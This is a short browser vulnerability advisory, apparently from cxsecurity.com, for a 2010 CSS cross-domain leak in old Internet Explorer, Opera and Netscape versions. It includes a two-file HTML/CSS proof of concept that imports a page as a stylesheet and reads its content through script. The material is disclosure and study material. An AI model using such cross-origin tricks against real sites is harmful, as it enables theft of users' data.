Multiple Web Browser (CSS) Cross Domain Vulnerability

2010.09.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Proof Of Concept: 1.html: <body> {}body{DOM: Cross Domain Vulnerability 2.html: <style> @import url("1.html"); </style> <script> setTimeout(function(){ var s = document.body.currentStyle.DOM; alert(s); },0); </script> Vulnerable: Microsoft Internet Explorer 6 & 8, IE 7 not tested Opera 10.62 Netscape v9.0.0.6 By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories/MBCCD.pdf

References:

http://Securitylab.ir/Advisories/MBCCD.pdf


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top